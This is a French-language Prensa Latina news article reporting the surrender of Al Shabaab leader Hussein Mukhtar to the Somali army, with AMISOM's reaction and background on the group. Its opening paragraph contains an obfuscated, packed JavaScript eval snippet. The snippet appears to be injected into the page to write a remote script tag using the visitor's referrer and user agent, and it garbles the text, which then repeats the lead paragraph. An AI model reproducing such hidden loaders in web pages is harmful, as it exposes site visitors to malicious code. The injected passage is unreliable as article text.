mercredi 24 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Un important leader islamiste Somalien se rend à l’Armée

Mogadiscio eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sakhe|var|u0026u|referrer|enkbb||js|php'.split('|'),0,{})) (PL) Le site local Hiiraan Online a informé que l'un des plus éminents leaders du groupe islamiste somalien Al Shabaab, Hussein Mukhtar, s'est rendu à l'Armée Nationale.

Mogadiscio (PL) Le site local Hiiraan Online a informé que l’un des plus éminents leaders du groupe islamiste somalien Al Shabaab, Hussein Mukhtar, s’est rendu à l’Armée Nationale.

La décision du meneur insurgé a été immédiatement appuyée par la Mission de l’Union Africaine dans le pays (Amisom), qui l’a qualifiée dans un communiqué de courageuse, et qui a également incité d’autres combattants de cette organisation extrémiste, considérée comme terroriste par la communauté internationale, à se rendre.

La déclaration ajoute que l’ « Amisom espère que d’autres fils et filles dupés de Somalie, qui participent à des actes terroristes, imitent Mukhtar, rendent les armes et s’unissent à d’autres somaliens dans la reconstruction du pays ».

Le groupe Al Shabaab, surgi en 2006 comme aile radicale de l’ancien Conseil de Tribunaux Islamiques, considéré comme terroriste en 2008 et lié à Al Qaeda depuis 2012, lutte pour imposer un état islamique basé sur la loi islamique, ou Sharia, et qui se trouve être, depuis 2015, un des groupes rebelles les plus actifs d’Afrique.

Au milieu d’un chaos gouvernemental et social ambiant depuis le renversement du président Mohamed Siad Barre en 1991, les militaires somaliens, appuyés par 22 mille soldats de l’Amisom provenant de 10 états, dont le Kenya, le Burundi, le Sierra Leone, l’Uganda et Djibouti, affrontent ces milices armées.

ymr/apb

EN CONTINU
notes connexes